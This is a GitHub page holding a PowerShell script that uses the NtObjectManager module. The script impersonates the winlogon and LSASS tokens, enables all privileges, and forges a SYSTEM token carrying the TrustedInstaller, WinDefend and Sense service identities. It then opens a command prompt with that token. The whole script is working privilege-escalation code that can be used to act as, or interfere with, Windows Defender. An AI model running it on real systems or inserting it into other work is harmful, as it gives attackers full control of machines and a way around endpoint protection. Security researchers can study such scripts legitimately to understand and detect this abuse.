-
Notifications
You must be signed in to change notification settings - Fork 3
/
ImpersonateWinDefend.ps1
106 lines (90 loc) · 3.23 KB
/
ImpersonateWinDefend.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# uses NtObjectManager module
# quick example code to craft a token containging WinDefend, TrustedInstaller and Sense token...
# https://github.com/rweijnen/Posh-Snippets/blob/master/ImpersonateWinDefend.ps1
# First get SYSTEM token via Winlogon
# get winlogon pid
$winLogonPid = (get-process winlogon).id
# get winlogon token
$winLogonToken = Get-NtTokenFromProcess $winLogonPid
# impersonate winlogon
$current = Get-NtThread -Current -PseudoHandle
$contextWinLogon = $current.Impersonate($winLogonToken)
# Then get LSASS token to get more privileges
# get lsass pid
$lsasPid = (Get-Process LSASS).Id
# get lsas token
$lsasToken = Get-NtTokenFromProcess $lsasPid
# impersonate lsas
$contextLsas = $current.Impersonate($lsasToken)
$disabledPrivileges = Get-NtTokenPrivilege | where {-not $_.Enabled } | select -Expand Name
ForEach ($priv in $disabledPrivileges)
{
Enable-NtTokenPrivilege -Privilege $priv
}
# enable all privileges, just because we can and might be useful for future purposes
$tokenParams = @{
User = 'SY' # SYSTEM
TokenType = 'Primary'
Access = 'MaximumAllowed'
IntegrityLevel = 'System'
Privileges = @(
'SeCreateTokenPrivilege',
'SeAssignPrimaryTokenPrivilege',
'SeLockMemoryPrivilege',
'SeIncreaseQuotaPrivilege',
'SeMachineAccountPrivilege',
'SeTcbPrivilege',
'SeSecurityPrivilege',
'SeTakeOwnershipPrivilege',
'SeLoadDriverPrivilege',
'SeSystemProfilePrivilege',
'SeSystemTimePrivilege',
'SeProfileSingleProcessPrivilege',
'SeIncreaseBasePriorityPrivilege',
'SeCreatePageFilePrivilege',
'SeCreatePermanentPrivilege',
'SeBackupPrivilege',
'SeRestorePrivilege',
'SeShutdownPrivilege',
'SeDebugPrivilege',
'SeAuditPrivilege',
'SeSystemEnvironmentPrivilege',
'SeChangeNotifyPrivilege',
'SeRemoteShutdownPrivilege',
'SeUndockPrivilege',
'SeSyncAgentPrivilege',
'SeEnableDelegationPrivilege',
'SeManageVolumePrivilege',
'SeImpersonatePrivilege',
'SeCreateGlobalPrivilege',
'SeTrustedCredmanAccessPrivilege',
'SeRelabelPrivilege',
'SeIncreaseWorkingSetPrivilege',
'SeTimeZonePrivilege',
'SeCreateSymbolicLinkPrivilege',
'SeDelegateSessionUserImpersonatePrivilege'
)
Groups = @(
'BA', #BUILTIN\ADMINISTRATORS
'WD', #EVERYONE
'S-1-5-6', #NT AUTHORITY\SERVICE
'S-1-5-11', #NT AUTHORITY\Authenticated Users
'S-1-5-15', #NT AUTHORITY\This Organization
'S-1-5-32-545', #BUILTIN\Users
$(Get-NtSid -ServiceName "TrustedInstaller"),
$(Get-NtSid -ServiceName "WinDefend"),
$(Get-NtSid -ServiceName "Sense")
)
}
# Create a new NT token with the specified parameters
$token = New-NtToken @tokenParams
$dupToken = Copy-NtToken -Token $token -ImpersonationLevel Impersonation -Access MaximumAllowed
New-Win32Process -CommandLine "cmd.exe /k echo **WINDOWS DEFENDER COMMAND PROMPT** && whoami /all" -Token $dupToken
$dupToken.Dispose()
$token.Dispose()
#revert
$contextLsas.Revert()
$contextLsas.Dispose()
$contextWinLogon.Revert()
$contextWinLogon.Dispose()
$current.Dispose()